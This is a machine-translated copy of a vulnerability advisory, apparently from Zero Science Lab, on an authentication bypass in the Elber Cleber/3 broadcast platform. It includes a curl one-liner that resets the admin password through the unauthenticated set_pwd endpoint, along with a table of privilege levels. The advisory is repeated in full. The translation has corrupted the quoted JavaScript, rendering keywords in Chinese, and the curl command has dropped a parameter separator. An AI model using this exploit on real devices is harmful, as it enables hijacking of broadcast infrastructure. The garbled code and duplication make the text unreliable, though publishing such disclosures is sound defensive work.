Elber Cleber/3广播多功能平台1.0.0身份验证旁路
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.0.0修订7304
1.0.0修订7284
1.0.0修订6505
1.0.0修订6332
1.0.0修订6258
XS2DAB v1.50 Rev 6267
Summary: Cleber提供了强大,灵活和模块化的硬件,
用于广播和贡献网络的软件平台
客户最多可以安装六个板,而无需限制
位置或数字。基于Linux嵌入式OS,它检测到
董事会的存在并显示了相关的控制接口
用户,通过Web GUI和触摸屏TFT显示屏。电源
可以是单个(AC和/或DC)或双重(可用于冗余的热交换);
客户可以在两个范围之间选择DC来源,即22-65
或10-36 VDC用于站点或DSNG应用程序。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass
wd},
53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5816
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5816.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.0.0修订7304
1.0.0修订7284
1.0.0修订6505
1.0.0修订6332
1.0.0修订6258
XS2DAB v1.50 Rev 6267
Summary: Cleber提供了强大,灵活和模块化的硬件,
用于广播和贡献网络的软件平台
客户最多可以安装六个板,而无需限制
位置或数字。基于Linux嵌入式OS,它检测到
董事会的存在并显示了相关的控制接口
用户,通过Web GUI和触摸屏TFT显示屏。电源
可以是单个(AC和/或DC)或双重(可用于冗余的热交换);
客户可以在两个范围之间选择DC来源,即22-65
或10-36 VDC用于站点或DSNG应用程序。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass

53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5816
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5816.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)